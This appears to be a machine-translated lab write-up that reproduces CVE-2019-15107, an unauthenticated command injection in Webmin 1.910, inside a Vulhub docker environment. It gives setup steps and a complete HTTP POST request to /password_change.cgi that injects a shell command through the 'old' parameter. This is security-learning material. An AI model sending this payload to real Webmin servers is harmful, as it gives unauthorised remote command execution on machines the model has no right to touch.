Vulhub vulnerability recurrence 73_ Webmin

CVE-2019-15107_Webmin Remote command execution vulnerability

Vulnerability Details

Webmin Is a management class Unix System management configuration tool , have Web page . In its find password page , There is a command injection vulnerability that does not require permission , Through this vulnerability, attackers can execute arbitrary system commands .

Reference link ：

-https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html

- https://www.exploit-db.com/exploits/47230

- https://blog.firosolutions.com/exploits/webmin/

Environment building

shooting range ：192.168.4.10_Ubuntu

Execute the following command , start-up webmin 1.910：

#docker-compose up -d

After execution , visit `https://your-ip:10000`, After ignoring the certificate, you can see webmin Login page for .

Loophole recurrence

The data package in the reference link is wrong , After reading the code , Only when sent user The value of the parameter is not known Linux In the case of users （ And the reference link is `user=root`）, Will enter the modification `/etc/shadow` The place of , Trigger command injection vulnerability .

Send the following packets , You can execute the command `id`：

```

POST /password_change.cgi HTTP/1.1

Host: your-ip:10000

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Cookie: redirect=1; testing=1; sid=x; sessiontest=1

Referer: https://your-ip:10000/session_login.cgi

Content-Type: application/x-www-form-urlencoded

Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

```